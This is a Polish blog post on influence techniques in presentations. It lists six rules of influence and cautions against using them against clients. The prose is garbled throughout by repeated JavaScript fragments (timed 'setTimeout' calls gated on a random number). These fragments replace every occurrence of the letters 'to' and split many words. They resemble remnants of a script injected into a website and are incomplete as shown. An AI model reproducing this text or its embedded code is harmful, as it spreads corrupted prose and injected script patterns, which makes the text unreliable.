Codziennie jesteśmy narażeni na wywieranie wpływu przez inne osoby na nas. Sami też wywieramy wpływ na innych. Część z tych mechanizmów dzieje się zupełnie nieświadomie. Część zachowań z jakimi się stykamy jest jednak zaplanowana. Wykorzystaj tę wiedzę w trakcie swojej prezentacji!
Wywieranie wpływu podczas publicznego wystąpienia
Podczas wystąpienia próbujesz sprzedać publiczności jakiś dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towar. Może dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to być idea Twojej organizacji, pomysł na zarobienie masy forsy produkując deseczki do mięsa, potrzebujesz tylko inwesdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torów :). Może sprzedajesz usługi takie jak: kupowanie prezentów na zamówienie (cieszy się dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to coraz większym powodzeniem) czy też sprzedaży dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towarów, np. kołder z australijskich owiec 🙂 W tym celu musisz się zastanowić jak wpływać na innych ludzi, w tym przypadku na słuchaczy Twojej prezentacji.
W kilku kolejnych wpisach pokażę Ci kilka technik składających się na wywieranie wpływu. Pewnie coś z tego arsenału już sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosujesz, świadomie bądź nieświadomie. Posługując się nimi pamiętaj o podstawowej zasadzie:
Techniki wywierania wpływu muszą być sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane z umiarem. Towary, usługi czy wreszcie sama formuła transakcji, nie mogą być wymierzone przeciwko kliendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom. Jeżeli w Twojej głowie pojawi się myśl: „ale go załatwiłem…” niech dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to będzie ostrzeżenie. W przeciwnym razie będzie dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Twoja ostatnia „udana” transakcja z tą osobą/osobami.
Poznaj 6 najważniejszych reguł wywierania wpływu.
Wywieranie wpływu na ludzi może przybierać wiele form. Większość z nich można jednak przypisać do jednej z sześciu kategorii. Każda z nich opiera się na jednej podstawowej regule psychologicznej sterującej przebiegiem ludzkiego myślenia a co za tym idzie postępowania.
1. Reguła wzajemności
2. Reguła konsekwencji
3. Reguła społecznego dowodu słuszności
4. Reguła lubienia
5. Reguła audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torytetu
6. Reguła niedostępności
Powyższe reguły działają w sposób audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomatyczny i bezrefleksyjny. Wskutek zalewającej nas coraz większej fali informacji i konieczności wyborów, rola audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomatycznych mechanizmów ( na tym właśnie bazują medom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tody wywieranie wpływu) będzie rosła w przyszłości.
W następnych wpisach zajmiemy się poszczególnymi regułami.
![]() |
Wpis Ci się podobał?
Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!